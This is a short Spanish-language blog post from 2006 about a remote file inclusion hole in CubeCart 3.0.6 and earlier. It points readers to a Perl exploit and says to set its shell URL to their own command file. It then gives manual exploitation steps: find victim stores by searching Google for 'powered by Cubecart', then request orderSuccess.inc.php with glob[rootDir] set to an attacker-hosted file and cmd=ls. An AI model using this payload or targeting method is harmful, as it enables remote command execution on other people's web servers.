ecoestadistica.com

domingo, enero 01, 2006

CubeCart <=3.0.6 Remote Command Execution Exploit...

Un Fallo en Cubecart permite a un atacante poder ejecutar comandos remotamente en un servidor victima...

El Bug se centra en estas lineas:


include($glob['rootDir']."/classes/htmlMimeMail.php"); (Tipico file inclusion)

Existe publicado un Exploit en Perl

NOTA; en esta linea cambiar: $shel = "http://website.com/cmd.txt"; # cmd shell url por donde se encuentra tu cmd

Explotacion Manual: google =) "powered by Cubecart" y agregamos simplemente a modo de ejemplo:
/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://tu-servidor.com/hack/nuevo.gif?&cmd=ls
o podemos usar los botshell como ya explique antes...

Salu2

0 Comments:

Publicar un comentario

Links to this post:

Crear un vínculo

<< Home

ecoestadistica.com